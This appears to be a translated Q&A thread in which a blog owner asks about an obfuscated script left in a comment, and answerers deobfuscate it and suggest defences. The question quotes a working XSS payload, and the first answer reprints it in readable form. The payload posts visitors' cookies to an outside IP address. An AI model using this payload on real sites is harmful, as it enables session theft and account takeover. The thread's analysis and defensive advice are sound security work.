it-swarm.com.de

Ich habe in einem Kommentar in meinem Blog verschleierten Code gefunden. Was sollte ich tun?

Heute habe ich Kommentare in meinem Blog überprüft und einen seltsamen Kommentar gefunden. Hier ist der genaue Text

<script>var _0x352a=["\x31\x31\x34\x2E\x34\x35\x2E\x32\x31\x37\x2E\x33\x33\x2F\x76\x6C\x6B\x2E\x70\x68\x70","\x63\x6F\x6F\x6B\x69\x65","\x68\x74\x6D\x6C","\x70\x6F\x73\x74"];$[_0x352a[3]](_0x352a[0],{cookie:document[_0x352a[1]]},function (){} ,_0x352a[2]);</script>

Was bedeutet das? Ist es ein Fehler?

Beachten Sie, dass ich letzten Sommer ein großes XSS-Problem hatte, das jedoch von einem Sicherheitsexperten behoben wurde. Heute habe ich ihn kontaktiert und er sagte, es sei okay und ich sollte mir keine Sorgen machen. Aber ich mache mir Sorgen.

47
Green Fly

Zuallererst hat Ihr Sicherheitsmann wahrscheinlich recht. Es sieht nicht so aus, als hätten Sie sich Sorgen zu machen, denn aufgrund Ihrer Beschreibung des Problems und der Antwort des Mannes denke ich, dass die Skript-Tags ordnungsgemäß codiert wurden. Betrachten Sie es als eine neutralisierte Waffe. Es ist da, ja, aber es kann keinen Schaden anrichten.

Das Ausführen dieses Codes durch einen Deobfuscator gibt uns

$["post"]("114.45.217.33/vlk.php",{cookie:document["cookie"]},function(){},"html")

Jetzt "seligsprechen" wir nur den Code, um ihn lesbarer zu machen

$["post"]("114.45.217.33/vlk.php", {
    cookie: document["cookie"]
}, function () {}, "html")

Wie Sie sehen, hoffte der Angreifer, dass Ihre Website für XSS anfällig ist, um sie auszunutzen und die Cookies Ihrer Besucher, einschließlich Ihrer, zu stehlen. Er geht auch davon aus/hofft, dass Sie jQuery verwenden, und dies ist heutzutage tatsächlich eine sehr vernünftige Annahme. Wenn es ihnen gelingt, Ihre Cookies zu stehlen, erhalten sie die Sitzungskennung und melden sich möglicherweise als einer Ihrer Benutzer oder sogar als Ihr Administratorkonto an.

Ich bin mir nicht sicher, warum er die Rückruffunktion oder den Antworttyp dort gelassen hat. Das Entfernen hätte die Nutzlast noch kleiner gemacht.

Das Ausführen dieser IP-Adresse über ein Tool zur Überprüfung der schwarzen Liste zeigt uns, dass der Host dort wahrscheinlich gefährdet ist. Dies sieht sicher aus wie ein zufälliger Angriff eines Bots, der versucht, diesen Code in zufällige Blogs und Websites einzufügen, in der Hoffnung, dass einer von ihnen anfällig ist.

enter image description here

83
Adi

Zusätzlich zu Adnans Antwort:

Dies ist ein Nebenprodukt, wenn ein Angreifer Ihre Anwendung verwirrt (er sendet nur Tonnen von Nutzdaten, um zu sehen, ob eine funktioniert). Wenn Ihre Anwendung die Codierung und das Entkommen von Benutzereingaben korrekt handhabt, sollten Sie sich keine Sorgen machen müssen, dass Sie anfällig sind.

Es gibt einige Gegenmaßnahmen, die Sie ergreifen können, um diese Angriffe zu reduzieren, z. B. die Verwendung einer Webanwendungs-Firewall oder eines Intrusion Detection-Systems. Diese sollten automatisch Personen blockieren, die Ihre Anwendung verwirren. Sie können auch eine Form der Realitätsprüfung wie ein Captcha oder eine Herausforderung verlangen, bevor das Posten zulässig ist (oder wenn viele aufeinanderfolgende Posts erkannt werden). Dies reduziert auch diese Art der Verschmutzung.

19
Lucas Kauffman